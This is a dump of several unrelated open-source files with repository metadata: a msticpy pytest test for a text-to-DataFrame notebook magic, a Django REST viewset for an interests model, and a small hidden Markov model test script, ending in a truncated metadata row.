373cd41477438cc8826cd2a2f8689be84f486339
/tests/datamodel/test_txt_df_magic.py
baf52606e5003c930809ff733806e64c924c83ef
[ "LicenseRef-scancode-generic-cla", "LGPL-3.0-only", "BSD-3-Clause", "LicenseRef-scancode-free-unknown", "ISC", "LGPL-2.0-or-later", "PSF-2.0", "Apache-2.0", "BSD-2-Clause", "LGPL-2.1-only", "Unlicense", "Python-2.0", "LicenseRef-scancode-python-cwi", "MIT", "LGPL-2.1-or-later", "GPL-2.0-or-later", "HPND", "ODbL-1.0", "GPL-1.0-or-later", "MPL-2.0" ]
permissive
https://github.com/RiskIQ/msticpy
cd42d601144299ec43631554076cc52cbb42dc98
44b1a390510f9be2772ec62cb95d0fc67dfc234b
refs/heads/master
"2023-08-27T00:11:30.098000"
"2021-06-17T22:54:29"
"2021-06-17T22:54:29"
374,787,165
1
0
MIT
true
"2021-09-16T19:05:43"
"2021-06-07T20:05:09"
"2021-07-29T16:04:07"
"2021-09-16T19:05:41"
23,582
1
0
0
Python
false
false
# ------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # -------------------------------------------------------------------------- """Test Text to DF magic.""" import pandas as pd import pytest_check as check from msticpy.datamodel.pivot_magic_core import run_txt2df __author__ = "Ian Hellen" # pylint: disable=redefined-outer-name _INPUT_TEST = """ file, lines1, lines2, lines3, percent msticpy___init__.py, 24, 12, 0, 50% msticpy__version.py, 1, 0, 0, 100% msticpy_analysis___init__.py, 3, 0, 0, 100% msticpy_analysis_anomalous_sequence___init__.py, 3, 0, 0, 100% msticpy_analysis_anomalous_sequence_anomalous.py, 34, 26, 0, 24% msticpy_analysis_anomalous_sequence_model.py, 222, 196, 0, 12% msticpy_analysis_anomalous_sequence_sessionize.py, 59, 52, 0, 12% msticpy_analysis_anomalous_sequence_utils___init__.py, 3, 0, 0, 100% msticpy_analysis_anomalous_sequence_utils_cmds_only.py, 76, 63, 0, 17% msticpy_analysis_anomalous_sequence_utils_cmds_params_only.py, 105, 91, 0, 13% msticpy_analysis_anomalous_sequence_utils_cmds_params_values.py, 126, 111, 0, 12% msticpy_analysis_anomalous_sequence_utils_data_structures.py, 27, 16, 0, 41% msticpy_analysis_anomalous_sequence_utils_laplace_smooth.py, 34, 28, 0, 18% msticpy_analysis_anomalous_sequence_utils_probabilities.py, 42, 35, 0, 17% """ # Magic args # "--sep", # "--name", # "--headers", # "--keepna", def test_txt2df(): """Test txt2df magic function.""" res_df = run_txt2df(line="", cell=_INPUT_TEST, local_ns=None) check.is_instance(res_df, pd.DataFrame) check.equal(res_df.shape, (15, 5)) # headers res_df = run_txt2df(line="--headers", cell=_INPUT_TEST, local_ns=None) check.is_instance(res_df, pd.DataFrame) check.equal(res_df.shape, (14, 5)) for col in _INPUT_TEST.split("\n")[1].split(","): check.is_in(col.strip(), list(res_df.columns)) # separator res_df = run_txt2df( line="--headers --sep=\t", cell=_INPUT_TEST.replace(",", "\t"), local_ns=None ) check.is_instance(res_df, pd.DataFrame) check.equal(res_df.shape, (14, 5)) # some malformed lines cell_input = [] for idx, line in enumerate(_INPUT_TEST.split("\n")): if line and idx % 5 != 3: cell_input.append(line + ",") else: cell_input.append(line) res_df = run_txt2df(line="--headers", cell="\n".join(cell_input), local_ns=None) # expect output with dropped columns check.is_instance(res_df, pd.DataFrame) check.equal(res_df.shape, (14, 5)) res_df = run_txt2df( line="--headers --keepna", cell="\n".join(cell_input), local_ns=None ) # expect output with no dropped columns check.is_instance(res_df, pd.DataFrame) check.equal(res_df.shape, (14, 6)) # add extra delimiters for 2 empty columns cell_input = [line + ", ," for line in _INPUT_TEST.split("\n") if line] res_df = run_txt2df( line="--headers --keepna", cell="\n".join(cell_input), local_ns=None ) # expect output with cols following header row check.is_instance(res_df, pd.DataFrame) check.equal(res_df.shape, (14, 7)) for col in ("Unnamed: 5", "Unnamed: 6"): check.is_in(col.strip(), list(res_df.columns)) # keepna should force blank columns to remain res_df = run_txt2df(line="--keepna", cell="\n".join(cell_input), local_ns=None) check.is_instance(res_df, pd.DataFrame) check.equal(res_df.shape, (15, 7)) # name namespace = {} res_df = run_txt2df( line="--headers --name=my_df", cell=_INPUT_TEST, local_ns=namespace ) check.is_instance(res_df, pd.DataFrame) check.equal(res_df.shape, (14, 5)) 
check.is_in("my_df", namespace) check.is_instance(namespace["my_df"], pd.DataFrame) check.equal(namespace["my_df"].shape, (14, 5))
UTF-8
Python
false
false
3,973
py
374
test_txt_df_magic.py
244
0.627234
0.590486
0
105
36.838095
85
dillan08/PAT
781,684,062,325
08e87b9bdd29e7d1b764f9b07d92253075c6a074
5528290429e3e98be841dc8a8ea504aa657f0187
/interesesCRUD/views.py
e8c553c895fefe3dd57a29fd08f1766b37a34d77
[]
no_license
https://github.com/dillan08/PAT
ac8973c2ccd9efbd8692bce4173dfc3e307e5a5a
39a75bc2a29bcaf7457c886989f291623dcd465d
refs/heads/development
"2020-09-15T01:44:55.021000"
"2016-10-21T13:29:08"
"2016-10-21T13:29:08"
67,364,883
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from rest_framework import viewsets
from rest_framework.response import Response
from rest_framework import status

from interesesCRUD.serializer import InteresSerializer
from nucleo.models import Interes


# Create your views here.
class InteresVS(viewsets.ModelViewSet):
    serializer_class = InteresSerializer
    queryset = Interes.objects.all()

    def create(self, request, *args, **kwargs):
        serializer = self.get_serializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        self.perform_create(serializer)
        headers = self.get_success_headers(serializer.data)
        return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
UTF-8
Python
false
false
701
py
37
views.py
36
0.758916
0.754636
0
19
35.842105
89
cccgp/Machine-Learning-Algorithms
7,206,955,150,475
5f190bacf4f98973372152479e50f67ffa0e52eb
105683b026cee117aa6d684b7450b3bb0d83094e
/hmm/tests/test_hmm.py
41b174adbc4152748a5e2ef878a1ad9b1679cffa
[]
no_license
https://github.com/cccgp/Machine-Learning-Algorithms
72debf53e89f4223ff45ebd3ca68587e39632d1e
ea1768ffc23f9ffb2d46172eb12c036f28ee09e6
refs/heads/master
"2020-04-24T18:03:42.579000"
"2019-02-28T03:18:02"
"2019-02-28T03:18:02"
172,168,321
1
1
null
null
null
null
null
null
null
null
null
null
null
null
null
import numpy as np
from hmm.hmm import Hmm
import time


def test_hmm():
    A = np.array([[0.5, 0.2, 0.3],
                  [0.3, 0.5, 0.2],
                  [0.2, 0.3, 0.5]])
    B = np.array([[0.5, 0.5],
                  [0.4, 0.6],
                  [0.7, 0.3]])
    PI = np.array([0.2, 0.4, 0.4])
    O = np.array([0, 1, 0])
    model = Hmm()
    model.forward(A, B, PI, O)
    model.vibiter(A, B, PI, O)


if __name__ == '__main__':
    start = time.time()
    test_hmm()
    end = time.time()
UTF-8
Python
false
false
452
py
17
test_hmm.py
16
0.462389
0.376106
0
20
20.6
69
Sergey-Laznenko/Stepik
6,880,537,646,653
c7c6b0dedae60d9d54c88dc2bd58a64d326b0447
f7463bd0ab18b41611d5ac725f65d3db3a3a7a1d
/Generation Python - A Beginner's Course/13_Functions/13.4(return)/6.py
935283dad1bd12b2d645cfb70defe4c8b60e6d5c
[]
no_license
https://github.com/Sergey-Laznenko/Stepik
f81c5aeead3fbd20628129d60ccce92b34724b97
5e1a1a76c3f6ed487cf8fc847913c890c8eac840
refs/heads/master
"2022-12-28T19:01:48.670000"
"2020-10-18T15:23:58"
"2020-10-18T15:23:58"
279,022,462
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
""" Напишите функцию convert_to_miles(km), которая принимает в качестве аргумента расстояние в километрах и возвращает расстояние в милях. """ def convert_to_miles(km): return km * 0.6214 num = int(input()) print(convert_to_miles(num))
UTF-8
Python
false
false
341
py
299
6.py
298
0.729508
0.709016
0
12
19.333333
101
rnlascano/PyMonitorMQTT
2,473,901,179,691
33f9b7682705b5204739d6236b545afc16525e48
b74c7f4cb3a460566e43b476e19b080eb93cc85f
/Sensors/RamSensor/RamSensor.py
ec07b9e9756583e4bb3ed1e1daee7fa47954a560
[]
no_license
https://github.com/rnlascano/PyMonitorMQTT
37e87fe7748ef0476b5c425ea50f5169adcfe578
c991a130bec808c16a0c02959cce379e3adef6fb
refs/heads/master
"2022-12-05T01:18:24.762000"
"2020-08-31T19:50:46"
"2020-08-31T19:50:46"
291,809,554
0
0
null
true
"2020-08-31T19:50:47"
"2020-08-31T19:46:04"
"2020-08-31T19:46:06"
"2020-08-31T19:50:46"
817
0
0
0
null
false
false
import psutil

from Sensors.Sensor import Sensor

TOPIC_RAM_PERCENTAGE = 'ram_used_percentage'


class RamSensor(Sensor):
    def Initialize(self):
        self.AddTopic(TOPIC_RAM_PERCENTAGE)

    def Update(self):
        self.SetTopicValue(TOPIC_RAM_PERCENTAGE, self.GetSystemRam())

    def GetSystemRam(self):
        return psutil.virtual_memory()[2]
UTF-8
Python
false
false
356
py
15
RamSensor.py
13
0.707865
0.705056
0
16
21.25
69
extreme-developers/ShoppingOnline
6,176,163,013,801
02685eea4e054c6dd198f6cb3e56eb851c0da1c7
356bbc95f450735840b5be1fffabc67d300f607a
/apps/mobiles/migrations/0005_typicalspecification_wifi.py
80b24616892e319a81710a0a5c55d4c6ed11bafb
[]
no_license
https://github.com/extreme-developers/ShoppingOnline
fb78be9ccd998e06143a890bbd68ba09b23c12f9
d4606315f1c2ee29e30a1cb47ee5dac3a3d640ac
refs/heads/master
"2020-06-10T01:33:58.642000"
"2018-03-08T12:51:00"
"2018-03-08T12:57:32"
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2017-10-17 09:05
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('mobiles', '0004_auto_20171017_0843'),
    ]

    operations = [
        migrations.AddField(
            model_name='typicalspecification',
            name='wifi',
            field=models.IntegerField(choices=[(1, '支持'), (2, '不支持')], default=1, verbose_name='WIFI'),
        ),
    ]
UTF-8
Python
false
false
523
py
138
0005_typicalspecification_wifi.py
92
0.596491
0.528265
0
20
24.65
103
yiziqi/vega
249,108,142,850
5f4b681f5556dc4ae36768d60652d48500413922
6bd21a64c5fbeba1682c3e65221f6275a44c4cd5
/vega/networks/__init__.py
9059f749e06ac4778ff9da8bcc68db5b581fcf33
[ "MIT" ]
permissive
https://github.com/yiziqi/vega
e68935475aa207f788c849e26c1e86db23a8a39b
52b53582fe7df95d7aacc8425013fd18645d079f
refs/heads/master
"2023-08-28T20:29:16.393000"
"2021-11-18T07:28:22"
"2021-11-18T07:28:22"
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding:utf-8 -*-

# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.

"""Import and register network automatically."""

from vega.common.class_factory import ClassFactory
from .network_desc import NetworkDesc

ClassFactory.lazy_register("vega.networks", {
    "adelaide": ["AdelaideFastNAS"],
    "bert": ["BertClassification", "TinyBertForPreTraining", "BertClassificationHeader"],
    "dnet": ["DNet", "DNetBackbone", "EncodedBlock"],
    "erdb_esr": ["ESRN"],
    "faster_backbone": ["FasterBackbone"],
    "faster_rcnn": ["FasterRCNN"],
    "mobilenet": ["MobileNetV3Tiny", "MobileNetV2Tiny"],
    "mobilenetv3": ["MobileNetV3Small", "MobileNetV3Large"],
    "necks": ["FPN"],
    "quant": ["Quantizer"],
    "resnet_det": ["ResNetDet"],
    "resnet_general": ["ResNetGeneral"],
    "resnet": ["ResNet"],
    "resnext_det": ["ResNeXtDet"],
    "sgas_network": ["SGASNetwork"],
    "simple_cnn": ["SimpleCnn"],
    "spnet_backbone": ["SpResNetDet"],
    "super_network": ["DartsNetwork", "CARSDartsNetwork", "GDASDartsNetwork"],
    "text_cnn": ["TextCells", "TextCNN"],
    "gcn": ["GCN"],
    "vit": ["VisionTransformer"],
    "mtm_sr": ["MtMSR"],
    "unet": ["Unet"]
})


def register_networks(backend):
    """Import and register network automatically."""
    if backend == "pytorch":
        from . import pytorch
    elif backend == "tensorflow":
        from . import tensorflow
    elif backend == "mindspore":
        from . import mindspore
UTF-8
Python
false
false
1,821
py
217
__init__.py
197
0.660077
0.654585
0
50
35.42
89
harrylee0810/TIL-c9
6,107,443,514,638
9fb23a2fe750fdd680bfe31d8f9f1ed0d81858cf
bb193c259e7efd696921496b92ec45dfdf3fe5a1
/django/auth/posts/admin.py
014a0dc9c082b3bd771df69a635927566165c6c7
[]
no_license
https://github.com/harrylee0810/TIL-c9
6f6526ac03690d29fb278f5c7903f90c254a510b
4a811e20d9ae9df17cf41c33047e4c876cacc8a8
refs/heads/master
"2020-04-17T17:18:15.261000"
"2019-02-12T08:59:29"
"2019-02-12T08:59:29"
166,777,152
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.contrib import admin
from .models import Post, Comment


# The admin page needs to be customized so that the content is shown as well
class PostAdmin(admin.ModelAdmin):
    list_display = ('title','content','created_at','updated_at',)


# Register your models here.
admin.site.register(Post, PostAdmin)
admin.site.register(Comment)
UTF-8
Python
false
false
350
py
14
admin.py
11
0.753289
0.753289
0
12
24.416667
65
zjulyx/LeetCodePython
2,276,332,684,502
7bd8021086d7ffb64013d31d27be4850b291826c
ccb288ffd441565d6dd40de7746325d51b7722d5
/Medium/面试题 08.14. 布尔运算.py
b0e7861d10b0e5739a33b7aab4ab89b3dfc618d4
[]
no_license
https://github.com/zjulyx/LeetCodePython
1dfbe765859dc90a13d2db2629bbbbd025bea94c
8953a8f7db215df169691b411e7eba47e5ac3632
refs/heads/master
"2020-03-26T21:53:25.716000"
"2020-03-26T10:40:04"
"2020-03-26T10:40:04"
145,415,356
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# Given a boolean expression and a desired boolean result `result`, where the expression
# consists of the symbols 0 (false), 1 (true), & (AND), | (OR) and ^ (XOR), implement a
# function that counts the number of ways to parenthesize the expression so that it
# evaluates to `result`.

# Example 1:
# Input: s = "1^0|0|1", result = 0
# Output: 2
# Explanation: the two possible parenthesizations are
# 1^(0|(0|1))
# 1^((0|0)|1)

# Example 2:
# Input: s = "0&0&0&1^1|0", result = 1
# Output: 10

# Hint:
# The number of operators does not exceed 19.
# Accepted: 65, Submissions: 169

# Source: LeetCode (力扣)
# Link: https://leetcode-cn.com/problems/boolean-evaluation-lcci
# Copyright belongs to LeetCode (领扣网络). For commercial reuse contact the official site
# for authorization; for non-commercial reuse please credit the source.


class Solution:
    def countEval(self, s: str, result: int) -> int:
        # Divide and conquer: cal returns the number of ways the current expression
        # evaluates to 0 and to 1.
        # For each operator, compute the 0/1 counts of its left and right sub-expressions,
        # then combine them according to the operator itself.
        # A dictionary memoizes the results to speed up the computation.
        d = {}

        def cal(s):
            if len(s) == 1:
                return (1 - int(s), int(s))
            if s in d:
                return d[s]
            cur0, cur1 = 0, 0
            for i in range(1, len(s)):
                if s[i] == '&' or s[i] == '|' or s[i] == '^':
                    l0, l1 = cal(s[0:i])
                    r0, r1 = cal(s[i + 1:])
                    if s[i] == '&':
                        cur0 += l0 * r0 + l0 * r1 + l1 * r0
                        cur1 += l1 * r1
                    elif s[i] == '|':
                        cur0 += l0 * r0
                        cur1 += l1 * r1 + l0 * r1 + l1 * r0
                    else:
                        cur0 += l0 * r0 + l1 * r1
                        cur1 += l0 * r1 + l1 * r0
            d[s] = (cur0, cur1)
            return d[s]

        return cal(s)[result]


if __name__ == '__main__':
    try:
        print(Solution().countEval(s="1^0", result=0))  # or Execute()
        print(Solution().countEval(s="1^0|0", result=0))  # or Execute()
        print(Solution().countEval(s="1^0|0|1", result=1))  # or Execute()
        print(Solution().countEval(s="0&0&0&1^1|0", result=0))  # or Execute()
    except Exception as err:
        print(err)
UTF-8
Python
false
false
2,393
py
787
面试题 08.14. 布尔运算.py
784
0.430269
0.37655
0
64
28.25
121
King-Of-Game/Python
17,154,099,400,376
6a6001c98f3f8ee05081bd7e1c0074b0663510c6
36afa271f080459adf1014cd23f4be9f954dfee6
/Example/date/生成日历.py
356d0d16c377d1ae4ad432132a237cf0249658d6
[]
no_license
https://github.com/King-Of-Game/Python
b69186a7574ce1c0b7097207cfe9a2eb38a90bc0
643b9fd22efd78f6679735f23432943a57b5f5bb
refs/heads/master
"2023-05-25T05:35:14.473000"
"2021-10-24T12:52:21"
"2021-10-24T12:52:21"
151,251,434
3
0
null
false
"2023-05-01T20:51:50"
"2018-10-02T12:34:04"
"2021-10-24T12:52:41"
"2023-05-01T20:51:50"
90,134
1
0
3
HTML
false
false
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# __author__ : YiXuan
# __date__ : 1/17/2021 1:15 PM
# __software__ : PyCharm

'''
Generate a calendar using the built-in module: calendar
'''

import calendar


# Generate the calendar
def generateCalender():
    while True:
        input_txt = input('***日历(输入q退出)***\n:')
        if input_txt in ['q', 'Q']:
            break
        try:
            year = int(input('请输入年份: '))
            month = int(input('请输入月份: '))
            # Show the calendar
            print(calendar.month(year, month))
        except ValueError:
            print('请输入合法的年份和月份!')


if __name__ == '__main__':
    generateCalender()
UTF-8
Python
false
false
701
py
250
生成日历.py
213
0.497512
0.477612
0
34
16.735294
47
kate-melnykova/Scientific-functions
163,208,790,147
6578105d74c3193e99407a39c6a97ee5a75c1cd5
f965d7db19fb8e032fa1b7dc028522a47ba9307d
/calcs/main.py
abd5bd45206521e35f0de41ede9eeeb88f5b68b0
[]
no_license
https://github.com/kate-melnykova/Scientific-functions
8da976a45933ac062404ae1ef957c336388a302a
697cedf42845efddd4d7ebc92d4237604df9014d
refs/heads/master
"2020-06-05T09:33:29.463000"
"2019-09-07T05:36:44"
"2019-09-07T05:36:44"
192,393,110
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from time import time

from flask import Blueprint
from flask import flash
from flask import url_for
from flask import redirect
from flask import request
from flask import render_template
from flask_login import LoginManager, UserMixin, login_required,\
    login_user, logout_user, current_user
import json
from redis import Redis

from factory_app import factory_app
from redispy import get_connection
from views.auth import User
from views.auth.login_form import auth
from sci_funcs.tasks import args_to_function
from sci_funcs.function_registry import function_registry

app, celery = factory_app()

######
# LoginManager setup
######
login_manager = LoginManager()
login_manager.init_app(app)


@login_manager.user_loader
def user_loader(username):
    user_db = get_connection(db=app.config['USER_DB']).get(username)
    if user_db is not None:
        return User.deserialize(user_db)
    else:
        return None


app.register_blueprint(auth)


@app.route('/', methods=['GET'])
@app.route('/index', methods=['GET'])
def index():
    print(f'Current user on index page {current_user}')
    return render_template('index.html')


@app.route('/schedule_calculation', methods=['POST'])
def schedule_calculation():
    assert request.method == 'POST'
    func_name = request.form['func_name']
    if func_name in function_registry:
        arguments = dict()
        arguments['func_name'] = func_name
        arguments['status'] = 'IN PROGRESS'
        arguments['start_time'] = time()
        for item in function_registry[func_name][1:]:
            arguments[item] = request.form[item]

        # get task identifier
        get_connection(db=app.config['CALCS_DB'])
        async_result = args_to_function.delay(arguments, function_registry[func_name][1:])

        message = json.dumps({"status": "PENDING",
                              "result": arguments,
                              "task_id": async_result.task_id
                              })
        get_connection(db=app.config['CALCS_DB']).set(f'celery-task-meta-{async_result.task_id}', message)

        return redirect(url_for('view_results'))
    else:
        assert func_name == 'expression'
        expression = request.form.expression
        flash(f'Submitted {expression}')
        return redirect(url_for('index'))


@app.route('/view_results', methods=['GET'])
def view_results():
    results_temp = {}
    connection = get_connection(db=app.config['CALCS_DB'])
    for key in connection.keys('*'):
        result = json.loads(connection.get(key))
        task_id = result['task_id']
        result = result['result']
        results_temp[task_id] = result
    return render_template('view_results.html', results=results_temp)


@app.route('/result', methods=['GET'])
@login_required
def view_specific_results():
    task_id = str(request.args.get('task_id', ''))
    key = str.encode(f'celery-task-meta-{task_id}')
    try:
        result = json.loads(get_connection(db=app.config['CALCS_DB']).get(key))
    except:
        flash('Task not found')
        return redirect(url_for('index'))

    result = result['result']
    return render_template(f'{ result["func_name"] }.html', result=result)


"""
next = flask.request.args.get('next')
# is_safe_url should check if the url is safe for redirects.
# See http://flask.pocoo.org/snippets/62/ for an example.
if not is_safe_url(next):
    return flask.abort(400)
return flask.redirect(next or flask.url_for('index'))

# handle login failed
@app.errorhandler(401)
def page_not_found(e):
    return Response('<p>Login failed</p>')
"""
UTF-8
Python
false
false
3,763
py
23
main.py
12
0.623173
0.620516
0
125
29.112
97
zufishantaj/mycodebase
2,259,152,830,516
43511dba102fa440f60d2ec79e4e14ae258f1db1
39fbaaa26779579ca1a6cfde95520425ae66ed89
/Class2/second.py
ac26dd91d29f0fc2abf8f49822a93717278e1c8e
[]
no_license
https://github.com/zufishantaj/mycodebase
02eb7d846a69bba2de1df27c068919a00c3f4d8c
74cba0a315bd129eff86190fbf4421ba28ab9a92
refs/heads/master
"2022-12-31T19:14:01.574000"
"2020-10-27T20:26:16"
"2020-10-27T20:26:16"
268,316,063
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
print('Please enter your name')
x=input()
print("Hello, "+ x)
UTF-8
Python
false
false
64
py
63
second.py
42
0.640625
0.640625
0
3
19.666667
31
tingleshao/leetcode
704,374,681,878
b6d9264107aaef6b00363629f1af6e7bda770158
02425f5fffe5f46961c3167c46302ef84c6e48a4
/palindrome_partitioning/main.py
0c58ebc78f553d215972a5b91fda0237e68af093
[]
no_license
https://github.com/tingleshao/leetcode
583718b5e58c3611f3db352d82017ba1d4482f18
e2c589a1e81282e1c3deb6dfc5cace595acb841b
refs/heads/master
"2021-01-23T03:43:31.256000"
"2015-01-23T18:00:25"
"2015-01-23T18:00:25"
29,308,438
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
class Solution:
    # @param s, a string
    # @return a list of lists of string
    def partition(self, s):
        result = []
        output = []
        self.DFS(s,0,output,result)
        return result

    def isPalindrome(self,s,start,end):
        # print start
        # print end
        while start < end:
            if s[start] != s[end]:
                return False
            start += 1
            end -= 1
        return True

    def DFS(self, s, start, output, result):
        if start == len(s):
            result.append(output)
            return
        for i in xrange(start,len(s)):
            if self.isPalindrome(s, start, i):
                output.append(s[start:i+1])
                # print output
                self.DFS(s,i+1,list(output),result)
                output.pop(-1)


def main():
    s = Solution()
    sti = "aab"
    print s.partition(sti)


if __name__ == "__main__":
    main()
UTF-8
Python
false
false
880
py
148
main.py
147
0.506818
0.5
0
37
22.810811
45
ShangSky/YangShop
9,637,906,647,953
ab56abe248bf279b90c3100a06cc82f5ad7a1d7f
6a96f3ed9cdffd3548845b44931e99345d7ba231
/FoodShop/apps/goods/admin.py
cb1b08c1a72d35974b57a5c688dda21aaabe7f41
[]
no_license
https://github.com/ShangSky/YangShop
ffca8c4d6e8468288dd6ce3e45e740e9cdc600ef
d2a7d0c1155fd7627d8bf7427bc72e9f2ee15fe9
refs/heads/master
"2020-06-22T12:45:11.749000"
"2020-06-06T03:17:04"
"2020-06-06T03:17:04"
197,717,146
2
1
null
false
"2021-04-08T19:34:38"
"2019-07-19T06:43:01"
"2020-06-06T03:17:31"
"2021-04-08T19:34:35"
2,954
2
1
13
Python
false
false
from django.contrib import admin
from .models import Goods, GoodsBanner, Category, IndexBanner

admin.site.site_header = admin.site.site_title = admin.site.index_title = '阳哥商城后台管理'


@admin.register(Goods)
class GoodsAdmin(admin.ModelAdmin):
    pass


@admin.register(GoodsBanner)
class GoodsBannerAdmin(admin.ModelAdmin):
    pass


@admin.register(Category)
class CategoryAdmin(admin.ModelAdmin):
    pass


@admin.register(IndexBanner)
class IndexBannerAdmin(admin.ModelAdmin):
    pass
UTF-8
Python
false
false
507
py
67
admin.py
43
0.775967
0.775967
0
23
20.304348
84
pmontu/indian_farming
11,854,109,739,581
7d30e2a5dad381de4e7cf912d2ac11bad4e532b9
c2a663f9892510c6069a23bc75710758476585b1
/usermgmt/serializers.py
787edacdbfc84ded032cfa0e75d014864579cd62
[]
no_license
https://github.com/pmontu/indian_farming
6e7f663520a8dcd162a7b654b61f86119c86da24
bdf3270d70c9ca487d52fdba7a865830ecd31580
refs/heads/master
"2021-01-21T05:23:04.678000"
"2017-02-27T05:44:34"
"2017-02-27T05:44:34"
83,179,818
2
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.contrib.auth.models import User
from rest_framework import serializers
from rest_framework.validators import UniqueValidator

from .models import CustomUser


class UserSerializer(serializers.Serializer):
    id = serializers.IntegerField(read_only=True)
    username = serializers.CharField(validators=[UniqueValidator(queryset=User.objects.all())])
    user_type = serializers.ChoiceField(
        CustomUser.SPECIAL_USER_CHOICES,
        source="customuser.user_type")
    password = serializers.CharField(
        max_length=128,
        write_only=True,
        style={'input_type': 'password'})
    is_superuser = serializers.BooleanField(read_only=True)

    def create(self, validated_data):
        customuser = validated_data.pop("customuser")
        user = User.objects.create_user(**validated_data)
        user_type = customuser["user_type"]
        CustomUser.objects.create(user=user, user_type=user_type)
        return user

    class Meta:
        model = User
UTF-8
Python
false
false
983
py
20
serializers.py
18
0.713123
0.710071
0
27
35.444444
95
verma7/dcos-cassandra-service-new
15,513,421,897,305
1370135a4616813c94d1bd380fe2ab22c84b2766
8a421507d3f46eee694f91813dd39a403de57dd5
/cli/dcos_cassandra/cassandra_utils.py
9cd9aa10b675bfbfca574cd954ed0caba2cea3cd
[ "Apache-2.0" ]
permissive
https://github.com/verma7/dcos-cassandra-service-new
c3e557df8cec2583f07e1457c6aff016461d1054
0e02914513e191b7b78d14f2b0b2525a092363ff
refs/heads/master
"2020-04-05T00:35:26.189000"
"2016-10-05T00:32:19"
"2016-10-05T00:48:59"
67,839,518
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#
# Copyright (C) 2015 Mesosphere, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import json

from dcos import util

__fwk = None


def get_fwk_name():
    return __fwk \
        or util.get_config().get('cassandra.service_name') \
        or "cassandra"


def set_fwk_name(name):
    global __fwk
    __fwk = name


def base_url():
    return util.get_config().get('core.dcos_url').rstrip("/")


def marathon_url(slash_command):
    return "%s/marathon/v2%s" % (base_url(), slash_command)


def api_url(slash_command):
    base_config_url = util.get_config().get('cassandra.url')
    if base_config_url is not None:
        base_config_url = base_config_url.rstrip("/")
    else:
        base_config_url = "%s/service/%s" % (base_url(), get_fwk_name())
    return "%s/v1%s" % (base_config_url, slash_command)


def to_json(responseObj):
    # throw any underlying request error
    responseObj.raise_for_status()
    # return json
    return responseObj.json()


def print_json(jsonObj):
    print(json.dumps(jsonObj, sort_keys=True, indent=4, separators=(',', ': ')))
UTF-8
Python
false
false
1,641
py
146
cassandra_utils.py
127
0.648995
0.642291
0
62
25.467742
74
vilmarferreira/recibo_1
2,113,123,918,256
135a106ccb8e97cdb998bcf048b863a09f52d856
e5b8d3fd12423648c9f0675d3b89b75fcd5a560b
/core/form.py
887f5137369e4a98f4e024537b351e1ca8d6918f
[]
no_license
https://github.com/vilmarferreira/recibo_1
834cca4e64121f87a05ef976920ce5ffe2a36890
1fab47df4408609063bd40f563f1e7bc1e32c589
refs/heads/master
"2020-04-13T17:11:22.393000"
"2018-12-27T22:26:47"
"2018-12-27T22:26:47"
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django import forms
from dal import autocomplete
from core.models import Receipt, Person


class ReceiptForm(forms.ModelForm):
    person = forms.ModelChoiceField(queryset=Person.objects.all(),widget=autocomplete.ModelSelect2(url='person-autocomplete'))

    class Meta:
        model=Receipt
        exclude= ()
UTF-8
Python
false
false
317
py
9
form.py
4
0.753943
0.750789
0
11
27.909091
126
parmarjh/graph-analytics-course
8,315,056,726,242
77f5b9fd6ef6bbc943dda37c5369a3f6182a39b7
bfccc163836369bb5e4b8a180ae0bda14bbdf6c2
/lecture-4/flows/flows.py
c086e520ad56c4a27c0f948b3c5b162c2b267407
[]
no_license
https://github.com/parmarjh/graph-analytics-course
dcec11eeb1d197b65a22f4e5cbadf509682d3912
0f04b0b743817f2f465e861938d055e644eefaeb
refs/heads/master
"2023-08-15T15:59:49.099000"
"2021-09-28T03:54:52"
"2021-09-28T03:54:52"
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import networkx as nx
import matplotlib.pyplot as plt
import pprint as pp

G = nx.read_edgelist('./graph-flow.txt', nodetype=str,
                     data=(('capacity', int),),
                     create_using=nx.DiGraph())

pos = nx.spring_layout(G)
nx.draw(G, pos, with_labels=True, node_color="#f86e00")

flow = nx.maximum_flow(G, _s="s", _t="t")
flow_value = nx.maximum_flow_value(G, _s="s", _t="t")

pp.pprint(flow)
print("Maximum flow value is: " + str(flow_value))

plt.show()
UTF-8
Python
false
false
467
py
87
flows.py
51
0.640257
0.631692
0
19
23.578947
74
Pycord-Development/pycord
16,363,825,413,142
709a8ca05db1f5d451dc6888781042788a38536b
681d42ab5a237b580436eab6271768aefee3048e
/discord/types/__init__.py
79e1e68bb7fbb6d1e91c2b0a2303a2f13c701158
[ "MIT" ]
permissive
https://github.com/Pycord-Development/pycord
d2555f7e08f0eea29653ee1e4f6fb7847a859500
a3bd2a04fbd7ac0cec5a119cc9b360965aaaab8e
refs/heads/master
"2023-08-29T07:10:24.810000"
"2023-08-29T01:37:00"
"2023-08-29T01:37:00"
400,837,389
2,960
941
MIT
false
